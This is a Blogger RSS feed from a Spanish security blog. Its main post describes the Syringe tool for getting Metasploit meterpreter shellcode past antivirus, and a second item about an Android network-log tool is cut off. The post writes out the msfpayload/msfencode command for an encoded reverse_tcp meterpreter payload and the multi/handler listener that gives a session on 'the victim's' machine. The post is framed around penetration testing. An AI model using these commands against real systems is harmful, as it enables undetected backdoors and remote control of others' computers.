<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearch/1.1/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-8268567775100190466</atom:id><lastBuildDate>Thu, 16 May 2013 05:53:19 +0000</lastBuildDate><category>HSTS</category><category>Bridge</category><category>Ciclo</category><category>ARP</category><category>Madrid</category><category>Bug</category><category>OSSAMS</category><category>ESET</category><category>McAfee</category><category>CYCON</category><category>Generation</category><category>Apple</category><category>Curso</category><category>Todos</category><category>Destacados</category><category>TIC</category><category>Integrity</category><category>ASP.NET</category><category>WPA2</category><category>Helicóptero</category><category>SSLCop</category><category>ENI</category><category>OWASP</category><category>INTECO</category><category>Threat</category><category>Cortafuegos</category><category>Seguridad Móviles</category><category>Eventos</category><category>Outbound</category><category>Servicio</category><category>Apache</category><category>Solution</category><category>Sniffer</category><category>DEP</category><category>Dropbox</category><category>MS12-020</category><category>Google+</category><category>Jazztel</category><category>Beta3</category><category>RFC</category><category>MSN</category><category>Nirsof</category><category>EKOPARTY</category><category>unhide</category><category>Christmas</category><category>Wireshark</category><category>Metasploit</category><category>CNIS</category><category>Rules</category><category>TeamDrive</category><category>SWSE</category><category>Legislación</category><category>Ciberseguridad</category><category>PAYLOAD</category><category>OSSIM</category><category>Ingeniería Social</category><category>Firefox</category><category>Guide</category><category>flickr</category><category>R2D2</category><category>Haking</category><category>Seguridad</category><category>Information</category><category>Kit</category><category>Blog</category><category>WAF</category><category>Take it Away</category><category>OSI</category><category>NGINX</category><category>Microsoft</category><category>IDS</category><category>Infografia</category><category>W3C</category><category>Seminario</category><category>Datos</category><category>Stratfor</category><category>Control</category><category>Claves</category><category>Opendomo</category><category>Meterpreter</category><category>Forensics</category><category>E-Learning</category><category>Brute Force Attack</category><category>Copia de Seguridad</category><category>Router</category><category>AVG</category><category>Universidad</category><category>Distro</category><category>Break</category><category>Directiva Europea</category><category>Blackberry</category><category>NATO</category><category>Chrome</category><category>Framework</category><category>SCADs</category><category>Essentials</category><category>Smartphone</category><category>Seguras</category><category>CMD</category><category>Problemas</category><category>BEAST</category><category>SSL</category><category>Exynos4</category><category>VUPEN</category><category>Gestión</category><category>PoC</category><category>Network</category><category>Orbot</category><category>Pinboard</category><category>Libro</category><category>UPNP</category><category>SGSI</category><category>Volume</category><category>Investigador</category><category>Seguridad Informatica</category><category>Exploit</category><category>Open Source</category><category>Ebook</category><category>zero-day</category><category>WifiAuditor</category><category>BOE</category><category>Pentester</category><category>Escritorio Remoto</category><category>Information Leak</category><category>Proxy</category><category>Hacktivism</category><category>Strong</category><category>Rapid7</category><category>Tools</category><category>Documentos</category><category>CarrierIQ</category><category>Zappos</category><category>Samsung</category><category>Escandalo</category><category>Sandbox</category><category>Aplicaciones</category><category>SP-800-61</category><category>Penetrate</category><category>Level</category><category>Public</category><category>CryptoChat</category><category>Llamadas</category><category>Frooger</category><category>Normativa</category><category>WPS</category><category>Andalucía</category><category>EMET</category><category>IT Security Audit</category><category>ISDEFE</category><category>Insolation</category><category>Default</category><category>Ataque</category><category>STIC</category><category>CTF</category><category>Virtual System</category><category>Kernel</category><category>parte2</category><category>Feliz</category><category>ACONSA</category><category>ISO 27002</category><category>SP-800-144</category><category>Herramienta</category><category>Elevated Privileges</category><category>Paper</category><category>MS10_046</category><category>HTTP</category><category>Ley</category><category>Flash</category><category>Games</category><category>Sección</category><category>Rootkit</category><category>Computer Security</category><category>Compliance</category><category>CAINE</category><category>SIEM</category><category>Boletin</category><category>Seguridad de la Información</category><category>IP</category><category>Post Explotiation</category><category>Wifileaks</category><category>SCADA</category><category>Criptografia</category><category>winunhide</category><category>Famosos</category><category>Handler</category><category>Mejoras</category><category>Adobe</category><category>SMS</category><category>HTC</category><category>SysAdmin</category><category>PSN</category><category>Reverse</category><category>Crypt4you</category><category>Karsperky</category><category>IPS</category><category>Cracking</category><category>CentOS</category><category>Movistar</category><category>SANS</category><category>URL</category><category>Chaos Computer Club</category><category>Blacksheep</category><category>XML</category><category>Octubre</category><category>Publico</category><category>TOR</category><category>Política</category><category>Navegador</category><category>IT Security</category><category>HIDS</category><category>Protocol</category><category>Monitorización</category><category>NSM</category><category>Bugs</category><category>Labs</category><category>Procesos</category><category>Bot</category><category>MSF</category><category>Wifi</category><category>Parte 1</category><category>Opinión</category><category>Primeras Impresiones</category><category>Firesheep</category><category>Hacking</category><category>SO</category><category>Hijacking</category><category>Free</category><category>Iberdrola</category><category>USBDeview</category><category>CVE</category><category>OS</category><category>Wireless</category><category>MSE</category><category>Phishing</category><category>DDoS</category><category>Backups</category><category>GWT</category><category>HTTS</category><category>DVD-Live</category><category>Covert Channels</category><category>MITM</category><category>2011</category><category>Explorer</category><category>CONpiler</category><category>Administrador</category><category>Experto</category><category>CONAN</category><category>Rasomware</category><category>Attack</category><category>Cambios</category><category>Hotmail</category><category>pathsync</category><category>User</category><category>Bienvenidos</category><category>PlayStation</category><category>Parte 2</category><category>2012</category><category>Vulnerabilidad</category><category>Assessment</category><category>Virus</category><category>SONY</category><category>Nube</category><category>Fotografía</category><category>SmartSniff</category><category>Córdoba</category><category>Book</category><category>GIAC</category><category>Jornadas</category><category>bypass</category><category>Lists</category><category>SecurimaTICa</category><category>INTECO-CERT</category><category>DroidCAT</category><category>Datos Personales</category><category>Patriot NG</category><category>ASLR</category><category>Keylogger</category><category>Internet</category><category>Herramientas</category><category>Certificados</category><category>UCO</category><category>Actualización</category><category>Stuxnet</category><category>ETS Ingenieros</category><category>website</category><category>Desktop Computing</category><category>Java</category><category>Privacidad</category><category>SOAP</category><category>Discretio</category><category>Principiante</category><category>Fixed</category><category>Browser</category><category>Malware</category><category>MDEF</category><category>Botnet</category><category>Update</category><category>ISO 27001</category><category>TLS</category><category>ARDrone</category><category>iptables</category><category>Password</category><category>Buenas Practicas</category><category>Yersinia</category><category>Issues</category><category>Redes</category><category>Analisis</category><category>CISCO</category><category>Ciberguerra</category><category>AES</category><category>Duqu</category><category>VLAN</category><category>SQL Injection</category><category>TIPS</category><category>Squert</category><category>Mozilla Firefox</category><category>domótica</category><category>Infeccion</category><category>AAPP</category><category>Network Security Monitor</category><category>Windows</category><category>CNP</category><category>16N</category><category>AppVMs</category><category>Hispasec</category><category>Skype</category><category>Alerta</category><category>Testing</category><category>Formación</category><category>Proyectos</category><category>Vulnerabilidades</category><category>Red</category><category>Begginers</category><category>Criticas</category><category>Cursos</category><category>MSFP</category><category>Scanner</category><category>CCDCoE</category><category>CCC</category><category>Norton</category><category>Autenticación</category><category>Documentation</category><category>iOS</category><category>MantisBT</category><category>backbuntu</category><category>Avanzado</category><category>FileVault</category><category>Mineria de Datos</category><category>Baseline</category><category>Estudiantes</category><category>System</category><category>v1</category><category>PDF</category><category>ETSI</category><category>Qubes-OS</category><category>Wireless Network Watcher</category><category>Pinterest</category><category>Actualidad</category><category>Información</category><category>Xenotix</category><category>USB</category><category>Navidad</category><category>VoIP</category><category>iPhone</category><category>Andromeda</category><category>VMware</category><category>Conficker</category><category>Snort</category><category>Consejos</category><category>SID</category><category>Security Onion</category><category>Sevilla</category><category>WinLockLess</category><category>OnLine</category><category>Webminar</category><category>BuyVip</category><category>Unix</category><category>Next</category><category>Estadisticas</category><category>Telefonica</category><category>Commands</category><category>NAC</category><category>Samba</category><category>Root</category><category>LSSI</category><category>ISO</category><category>CVE-2012-2808</category><category>Anonymous</category><category>Encryption</category><category>Cryptocat</category><category>TA</category><category>Troyano</category><category>WebFinger</category><category>Oracle</category><category>Spyware</category><category>XI</category><category>GUI</category><category>Cifrado</category><category>No-Script</category><category>Shell</category><category>Prot-ON</category><category>Videos</category><category>Manual</category><category>VM</category><category>PulWifi</category><category>Part 3</category><category>Logs</category><category>Winer</category><category>Syringe</category><category>CyberDefense</category><category>CCN-CERT</category><category>Virtual</category><category>Storage</category><category>LOPD</category><category>Charlas</category><category>FBPwn</category><category>G+</category><category>ISACA</category><category>NAXSI</category><category>ENISA</category><category>Facebook</category><category>Amenazas</category><category>Appstore</category><category>RDP</category><category>Solve</category><category>configuración segura</category><category>SpyEye</category><category>Infospyware</category><category>Make</category><category>KDE</category><category>Almacenamiento</category><category>DNSSEC</category><category>Pen-Testing</category><category>Cloud Computing</category><category>Office</category><category>Lock</category><category>CSF</category><category>Server</category><category>Extension</category><category>Capture</category><category>parte 3</category><category>Ataques</category><category>Google</category><category>Hashes</category><category>DroidBox</category><category>hardening</category><category>Linux</category><category>Sesion</category><category>Resuem</category><category>DoS</category><category>VirusTotal</category><category>Sistemas</category><category>NetworkMiner</category><category>parte 4</category><category>Analysis</category><category>Plattaform</category><category>Configuración</category><category>Tablon de Anuncios</category><category>Security Breach</category><category>QR Codes</category><category>Offline</category><category>Informe</category><category>DNS</category><category>ASafaWEB</category><category>Protected</category><category>HTTPS</category><category>Part I</category><category>XSSF</category><category>Cryptored</category><category>Exploitshield</category><category>SecurityTube</category><category>Infraestructuras</category><category>Pivoting</category><category>Voz</category><category>AP</category><category>Metodología</category><category>Rogue</category><category>Security+</category><category>Firmware</category><category>Web</category><category>Gobierno</category><category>CIS</category><category>Magazine</category><category>2012-1182</category><category>Pentesting</category><category>NIST</category><category>Secure</category><category>PacketFence</category><category>Packet</category><category>Apps</category><category>TrendMicro</category><category>SGSII</category><category>SGADs</category><category>Revista</category><category>Hopping</category><category>Bidikey</category><category>Antivirus</category><category>X-Ray</category><category>CIR</category><category>ENCODE</category><category>Modulo</category><category>Backdoor</category><category>Whatsapp</category><category>Etico</category><category>VEGA</category><category>LNK</category><category>Add-ons</category><category>WPA</category><category>Nokia</category><category>Geolocalización</category><category>Webcam</category><category>Sistema</category><category>Cheat Sheet</category><category>Metadatos</category><category>ENISE</category><category>Foro</category><category>Gmail</category><category>Reto</category><category>Next Security OS Generation</category><category>Part II</category><category>Kali</category><category>Webcast</category><category>PYMES</category><category>Setup</category><category>Aula</category><category>MS11-083</category><category>Parche</category><category>Incident</category><category>Alemania</category><category>Defensa</category><category>Empresa</category><category>Accenture</category><category>Copy</category><category>Socket</category><category>HTML</category><category>Trendnet</category><category>Sguil</category><category>RootedCON</category><category>Process</category><category>Presentacion</category><category>Recomendación</category><category>Beta 2</category><category>Clickjacking</category><category>Shadow</category><category>Webapps</category><category>XSS</category><category>Reseacher</category><category>Demo</category><category>BackTrack</category><category>Legal</category><category>Desarrolladores</category><category>Real-Time</category><category>Windows 8</category><category>W8Pro</category><category>Challege</category><category>Comprobación</category><category>Spy</category><category>Firewall</category><category>Security</category><category>Front</category><category>Protección</category><category>Seclabs</category><category>CSA</category><category>SXato2</category><category>Part III</category><category>WIL</category><category>CyberWarfare</category><category>Noticias</category><category>Auditor</category><category>Seguridad Moviles</category><category>German</category><category>Estrategia</category><category>Software</category><category>US-CERT</category><category>UPyD</category><category>Xplico</category><category>Android</category><category>Ingenieros</category><category>Windows 7</category><category>Activos</category><category>Mobile</category><category>Correo</category><category>Social</category><category>NSA</category><category>ST2Labs</category><category>Script</category><category>Petesting</category><category>Boxcryptor</category><category>Firmas</category><category>How to</category><category>EMAD</category><category>Plantillas</category><category>Robo</category><category>ENS</category><category>Comunicaciones</category><category>PKI</category><category>Taller</category><category>VSC</category><category>Incidencias</category><category>Procedimientos</category><category>Vector</category><category>Finger</category><category>Academía</category><title>Seguridad para Todos | ST2 </title><description /><link>http://www.seguridadparatodos.es/</link><managingEditor>noreply@blogger.com (Julián Gonzalez)</managingEditor><generator>Blogger</generator><openSearch:totalResults>260</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SXato2" /><feedburner:info uri="sxato2" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>SXato2</feedburner:emailServiceId><feedburner:feedburnerHostname>http://feedburner.google.com</feedburner:feedburnerHostname><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-4966789867536500382</guid><pubDate>Wed, 08 May 2013 09:55:00 +0000</pubDate><atom:updated>2013-05-08T12:08:43.819+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Syringe</category><category domain="http://www.blogger.com/atom/ns#">ST2Labs</category><category domain="http://www.blogger.com/atom/ns#">Script</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">PAYLOAD</category><category domain="http://www.blogger.com/atom/ns#">bypass</category><category domain="http://www.blogger.com/atom/ns#">ENCODE</category><category domain="http://www.blogger.com/atom/ns#">Noticias</category><category domain="http://www.blogger.com/atom/ns#">Metasploit</category><category domain="http://www.blogger.com/atom/ns#">Antivirus</category><title>[Tool] Syringe Antivirus Bypass usando Meterpreter como Payload</title><description>&lt;div style="text-align: justify;"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-y_m_04EN0_k/UYoi4QhnuyI/AAAAAAAAEh8/-vIlcaBlozM/s1600/Syringe_Post_Head.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-y_m_04EN0_k/UYoi4QhnuyI/AAAAAAAAEh8/-vIlcaBlozM/s1600/Syringe_Post_Head.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Hace un tiempo publique una&amp;nbsp;&lt;a href="http://www.seguridadparatodos.es/search/label/MSFP" target="_blank"&gt;serie de tres artículos&lt;/a&gt;&amp;nbsp;sobre las diferentes forma de crear un fichero ejecutable &amp;nbsp;(exe) con capacidad de evasión del sistema Antivirus utilizando el framework de seguridad #Metasploit.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
En su momento estuve tentado de crear un script que generase un ejecutable con un&amp;nbsp;&lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payloads.html" target="_blank"&gt;PAYLOAD&lt;/a&gt; según unas especificaciones previas, y &amp;nbsp;que automáticamente comprobase en Virustotal su eficacia. Ahora, buceando en Internet he ido a parar a&amp;nbsp;&lt;a href="http://www.commonexploits.com/"&gt;http://www.commonexploits.com&lt;/a&gt;&amp;nbsp;quién ha creado precisamente un script que realiza exactamente eso, es decir, generar un payload con metasploit con técnicas de evasión de antivirus.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Sin embargo, aunque el script (&lt;a href="http://www.commonexploits.com/?p=789" target="_blank"&gt;AV0id&lt;/a&gt;) es muy interesante, ese mismo artículo me ha puesto sobre la pista de una herramienta de gran utilidad,&amp;nbsp; cuyo objetivo es evadir (bypass) los sistema antivirus. Es precisamente sobre esto ultimo de lo que voy a hablar a continuación.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Qué es syringe?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Durante un test de penetración puede resultar muy&amp;nbsp;útil&amp;nbsp;disponer algún ejecutable con capacidad de "puerta trasera" (backdoor) con el que demostrar la debilidad encontrada tomando el control del equipo objeto del&amp;nbsp;análisis. Es en este punto donde entra en juego el &lt;a href="https://code.google.com/p/syringe-antivirus-bypass/downloads/list" target="_blank"&gt;&lt;b&gt;Syringe&lt;/b&gt;&lt;/a&gt; creado por un investigador de Seguridad independiente llamado Hasan (aka &lt;a href="https://twitter.com/inf0g33k" target="_blank"&gt;inf0g33k&lt;/a&gt;). Hasan publica un documento técnico (&lt;a href="http://www.exploit-db.com/wp-content/themes/exploit/docs/20420.pdf" target="_blank"&gt;PDF&lt;/a&gt;) donde explica la&amp;nbsp;técnica&amp;nbsp;que utiliza para cargar la shell, generada con Metasploit, en memoria y demuestra con un ejemplo su funcionamiento.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
La herramienta, básicamente carga en&amp;nbsp;memoria un PAYLOAD de tipo meterpreter generado por Metasploit, utilizando técnicas de &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload2.html" target="_blank"&gt;ENCODING&lt;/a&gt; de forma que pueda evadir el sistema Antivirus del sistema. &lt;span style="font-size: xx-small;"&gt;(Asunto que ya se ha tratado en otra ocasión en el&lt;a href="http://www.seguridadparatodos.es/search/label/MSFP" target="_blank"&gt; blog&lt;/a&gt;).&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Cómo funciona?&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Esta herramienta, &lt;a href="https://code.google.com/p/syringe-antivirus-bypass/" target="_blank"&gt;syringe&lt;/a&gt;, utiliza la función VirtualAlloc para reservar una región de la memoria en Windows con permisos de ejecución&amp;nbsp;específicos (read and write).&amp;nbsp;Esta función requiere que el shell code este formado con caracteres&amp;nbsp;alfanuméricos&amp;nbsp;para que puede ser ejecutado.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-ITslqgRrjbc/UYoU9sW3cZI/AAAAAAAAEhs/hLb4y-okyWE/s1600/Syringe_esquema_bypass_AV.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="480" src="http://4.bp.blogspot.com/-ITslqgRrjbc/UYoU9sW3cZI/AAAAAAAAEhs/hLb4y-okyWE/s640/Syringe_esquema_bypass_AV.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para generar el código (shellcode) utiliza el framework Metasploit, luego genera un&amp;nbsp;ejecutable utilizando la herramienta 7z&amp;nbsp;y una serie de bash script, &amp;nbsp;fragmento de código en visual basic script (vbs) simplemente es para oculta el terminal de consola durante la ejecución del bash script. Cómo nota de interes, el autor, en su herramienta syringe introduce el código (shellcode) en un bloque estructurado del tipo SEH (Structured Exception Handler) que será el que habilite la ejecución del código (shellcode) de forma&amp;nbsp;exitosa, a&amp;nbsp;través&amp;nbsp;de la función VirtualAlloc.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Los&amp;nbsp;parámetros&amp;nbsp;utilizado para generar el PAYLOAD son:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;i&gt;msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread&lt;br /&gt;LPORT=4444 LHOST=IP_KalinLinux R | msfencode -a x86 -e&lt;br /&gt;x86/alpha_mixed -t raw BufferRegister=EAX&lt;/i&gt;&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Una vez creado el ejecutable SFX, se debe de iniciar un servidor que gestione las conexiones en el puerto 4444 del shellcode generado, esto se hace tal y como se vio en mi &lt;a href="http://www.seguridadparatodos.es/2013/03/Metasploit-Encoding-payload3.html" target="_blank"&gt;artículo &lt;/a&gt;sobre Metasploit, de forma que:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;i&gt;msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp&lt;br /&gt; &lt;/i&gt;&lt;i&gt;EXITFUhread LPORT=4444 LHOST=IP_KaliLinux E&lt;/i&gt;&lt;/blockquote&gt;
&lt;div style="text-align: justify;"&gt;
Llegados a este punto, solo es necesario ejecutar el fichero SFX (exe) generado [bash script makeExeFromBat.bat] y tendremos una sesión de meterpreter sobre el equipo de la victima.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Download&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-SWkwdGXo6O8/TmOkkR-psqI/AAAAAAAABN4/p88iDoTfLWI/s1600/Download_ICOnS.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Licencia&lt;/b&gt;:&amp;nbsp;&lt;a href="http://www.gnu.org/licenses/gpl.html" rel="nofollow" style="background-color: white; color: #0000cc; font-family: arial, sans-serif; font-size: 13px;"&gt;GNU GPL v3&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;WEB&lt;/b&gt;:&amp;nbsp;&lt;a href="https://code.google.com/p/syringe-antivirus-bypass/"&gt;https://code.google.com/p/syringe-antivirus-bypass/&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;Fichero:&lt;/b&gt;&amp;nbsp;&lt;a href="https://syringe-antivirus-bypass.googlecode.com/files/syringe%200.1.tar" target="_blank"&gt;Syringe_Pack&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
SHA:&amp;nbsp;&lt;span style="background-color: white; font-family: arial, sans-serif; font-size: 13px; white-space: nowrap;"&gt;b720d32f2ad43defab223d85646ac6b3786f9de7&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;Referencias:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[1] &lt;a href="http://www.commonexploits.com/?p=789" target="_blank"&gt;AV0id Script Bypass AV System&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
[2] &lt;a href="http://www.exploit-db.com/wp-content/themes/exploit/docs/20420.pdf" target="_blank"&gt;WhitePaper [PDF|EN] Bypassing antivirus with sharp syringe&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Via:&amp;nbsp;&lt;a href="https://twitter.com/teamcymru" target="_blank"&gt;@teamcymru&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=f2lZDMhMYN4:bC4cqkpyKEo:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=f2lZDMhMYN4:bC4cqkpyKEo:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=f2lZDMhMYN4:bC4cqkpyKEo:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=f2lZDMhMYN4:bC4cqkpyKEo:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=f2lZDMhMYN4:bC4cqkpyKEo:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=f2lZDMhMYN4:bC4cqkpyKEo:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=f2lZDMhMYN4:bC4cqkpyKEo:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=f2lZDMhMYN4:bC4cqkpyKEo:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SXato2?a=f2lZDMhMYN4:bC4cqkpyKEo:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SXato2?i=f2lZDMhMYN4:bC4cqkpyKEo:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SXato2/~4/f2lZDMhMYN4" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SXato2/~3/f2lZDMhMYN4/tool-syringe-antivirus-bypass-usando.html</link><author>noreply@blogger.com (Julián Gonzalez)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-y_m_04EN0_k/UYoi4QhnuyI/AAAAAAAAEh8/-vIlcaBlozM/s72-c/Syringe_Post_Head.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadparatodos.es/2013/05/tool-syringe-antivirus-bypass-usando.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8268567775100190466.post-5647245972191750397</guid><pubDate>Tue, 07 May 2013 09:44:00 +0000</pubDate><atom:updated>2013-05-07T11:44:02.938+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Network</category><category domain="http://www.blogger.com/atom/ns#">Tools</category><category domain="http://www.blogger.com/atom/ns#">Security</category><category domain="http://www.blogger.com/atom/ns#">Mobile</category><category domain="http://www.blogger.com/atom/ns#">Analisis</category><category domain="http://www.blogger.com/atom/ns#">Root</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">Real-Time</category><category domain="http://www.blogger.com/atom/ns#">Android</category><category domain="http://www.blogger.com/atom/ns#">Logs</category><category domain="http://www.blogger.com/atom/ns#">iptables</category><title>[Tools] Network Log: Analizador en tiempo real del registro de conexiones de red (logs) en Android</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-2sNJZAXsl70/UYjMf16uO3I/AAAAAAAAEhQ/GJdl98RgFAk/s1600/Network_Logs.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-2sNJZAXsl70/UYjMf16uO3I/AAAAAAAAEhQ/GJdl98RgFAk/s1600/Network_Logs.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="font-size: large;"&gt;¿Qué es Network Log?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
